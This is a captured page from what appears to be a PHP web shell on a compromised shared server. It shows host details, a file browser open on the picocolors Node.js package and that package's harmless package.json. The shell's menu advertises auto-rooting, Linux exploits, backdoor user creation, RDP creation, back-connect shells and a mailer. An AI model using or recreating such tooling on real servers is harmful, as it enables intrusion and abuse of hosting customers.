Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
picocolors /
[ HOME SHELL ]
Name
Size
Permission
Action
package.json
1.03
KB
-rw-r--r--
picocolors.browser.js
360
B
-rw-r--r--
picocolors.d.ts
138
B
-rw-r--r--
picocolors.js
2.53
KB
-rw-r--r--
types.ts
610
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "picocolors", "version": "1.0.0", "main": "./picocolors.js", "types": "./picocolors.d.ts", "browser": { "./picocolors.js": "./picocolors.browser.js" }, "sideEffects": false, "description": "The tiniest and the fastest library for terminal output formatting with ANSI colors", "scripts": { "test": "node tests/test.js" }, "files": [ "picocolors.*", "types.ts" ], "keywords": [ "terminal", "colors", "formatting", "cli", "console" ], "author": "Alexey Raspopov", "repository": "alexeyraspopov/picocolors", "license": "ISC", "devDependencies": { "ansi-colors": "^4.1.1", "benchmark": "^2.1.4", "chalk": "^4.1.2", "clean-publish": "^3.0.3", "cli-color": "^2.0.0", "colorette": "^2.0.12", "kleur": "^4.1.4", "nanocolors": "^0.2.12", "prettier": "^2.4.1" }, "prettier": { "printWidth": 100, "useTabs": true, "tabWidth": 2, "semi": false, "arrowParens": "avoid" }, "clean-publish": { "cleanDocs": true } }
Close